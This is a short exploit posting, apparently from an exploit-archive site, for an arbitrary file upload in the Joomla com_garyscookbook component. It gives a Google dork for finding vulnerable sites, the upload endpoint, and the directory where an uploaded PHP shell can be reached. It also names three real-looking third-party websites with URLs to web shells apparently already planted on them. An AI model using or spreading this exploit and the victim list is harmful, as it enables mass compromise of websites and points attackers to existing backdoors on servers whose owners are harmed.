Joomla com_garyscookbook file upload

2016.05.13

Credit: Hacker Khan

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: "inurl:com_garyscookbook"

##########################
# Exploit Title: joomla com_garyscookbook file upload
# Dork Google: "inurl:com_garyscookbook"
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Vendor: www.joomla.it
# Version: 2_4_2
# Tested on : win Xp
##########################

poc:

localhost/path/index.php?option=com_garyscookbook&func=newItem

###########################

upload shell php and go 2 :

localhost/path/components/com_garyscookbook/img_pictures/shell.php

############################

1) http://www.kouzinapapanagiotou.gr/index.php?option=com_garyscookbook&func=newItem

http://www.kouzinapapanagiotou.gr//components/com_garyscookbook/img_pictures/dz-hp-0.php

2) http://oneiron.gr/index.php?option=com_garyscookbook&func=newItem

http://oneiron.gr/components/com_garyscookbook/img_pictures/dzdz-hp-0.php

3 ) https://www.vitamix.co.uk/index.php?option=com_garyscookbook&func=newItem

https://www.vitamix.co.uk//components/com_garyscookbook/img_pictures/help.php

############################

#Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd ||Sh@d0w ||

MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier ||

And All Of Iranian Anonymous .

# Discovered By: Hacker Khan

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Joomla com_garyscookbook file upload

Dork: "inurl:com_garyscookbook"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.